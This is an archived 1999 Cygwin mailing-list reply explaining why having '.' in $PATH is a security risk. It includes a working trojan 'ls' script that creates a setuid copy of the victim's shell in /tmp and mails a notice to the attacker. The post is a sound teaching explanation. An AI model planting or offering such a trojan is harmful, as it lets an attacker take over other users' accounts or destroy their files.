"." in $PATH

[Michael Wood]

Hi

-----Original Message-----
From: Will Mooar <willm@ihug.co.nz>
To: SWarsMatt@aol.com <SWarsMatt@aol.com>; gnu-win32@cygnus.com
<gnu-win32@cygnus.com>
Date: Monday, January 11, 1999 5:12 PM
Subject: Re: Problem with /bin mount?


>This is normal for unix (and cygwin) - it only searches for applications to
>run from the PATH environment variable.  If "." is not in the PATH, it
won't
>find configure in the current directory.
>
>I have seen people mention that this is generally a bad idea, as it may
pose
>a security threat.  Unfortunately, no-one has elaborated why.  I can't see
>why it would be a problem for windows, except that it might accidentally
run
>the wrong thing if two or more programs exist with the same name, but
>function differently.


This is exactly what the security risk is.

If the default path on a machine looks like this:
    .:/bin:/usr/bin:/usr/local/bin

and I put the following script in /tmp:
    #!/bin/sh

    cp /bin/sh /tmp/.sh.$$
    chown $UID /tmp/.sh.$$
    chmod 4755 /tmp/.sh.$$
    echo "$$" | mail -s "Got one" me
    ls $*

and call it "ls", I could collect shells for other peoples' accounts by
waiting for them to cd to /tmp and type "ls".

If "." is last in the path, I would have to name the script something like
"sl" and wait for a typo.

If the person with . in their path is root, the problem is much worse.

The script could also try to delete files instead of creating a SUID shell
or do something else as the user executing it.

--
Michael Wood        | Kingsley Technologies
wood@kingsley.co.za | Tel: +27 21 762 0276

-
For help on using this list (especially unsubscribing), send a message to
"gnu-win32-request@cygnus.com" with one line of text: "help".